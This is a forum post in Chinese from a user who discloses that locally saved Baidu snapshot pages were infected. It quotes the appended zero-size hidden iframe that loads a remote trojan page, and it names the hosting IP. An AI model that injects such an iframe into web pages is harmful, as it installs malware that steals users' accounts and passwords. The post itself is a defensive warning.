chataewoo
新手上路
UID 72339
精华
0
积分 27
帖子 20
金钱 27 喜悦币
威望 0
人脉 0
阅读权限 10
注册 2006-4-25
状态 离线
|
揭露一个.htm木马(木马种植服务器在江苏省镇江市电信)
今天打开一些另存在本地硬盘上的百度快照的.htm网页,无论打开那个网页,都会自动在windows以及system32系统文件夹中被种植木马,并在最后一个盘里,种植设置为系统和隐藏属性的autorun.inf和autorun.exe。
好在本人机器安装了冰点还原软件,并且将各个磁盘区设置为不自动运行autorun.inf内容,所以删除autorun.inf和autorun.exe,重启后C盘(系统盘)自动恢复原样。
用编辑器打开这些网页,发现所有网页代码的最后一行后赫然被添加了如下内容:
<IFRAME SRC="http://un.u***u.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
用IE打开http://un.u***u.com,提示我无权访问。靠,正经网站还会这么
鬼鬼祟祟的?必然有鬼!
*查其IP地址为:222.186.191.123
*物理地址为:江苏省镇江市 电信
估计是租用了某个电信机房,或者利用了某个企业的内部的服务器。
利用你某次不小心的时机,将你硬盘里所有的.htm或者可能还包括.html文件的源代码加上:
<IFRAME SRC="http://un.u***u.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
打开的窗口长宽为0,所以你是看不见这个窗口的,但是实际上你已经访问了 un.u***u.com 的 baidu.htm 页面,这个页面就是针对百度搜索页面另存在本地的网页设计的木马种植程序页面,显然是有人故意设计的,以将木马种植到我们机器里,来盗取我们的各种帐号和密码!!!而杀毒软件是不会发现这些代码有问题的,用心何其险恶!!!
本人对各种木马和病毒深恶痛疾,恨不得将这些制造和故意传播木马和病毒的人全部投入粪坑,让其求生不得,求死不能!!!聪明的脑袋没用在正经地方,就是个傻比!
有江苏的朋友,知道这个地址和服务器的,请通报一下具体情况,必要时请报案。
|
|
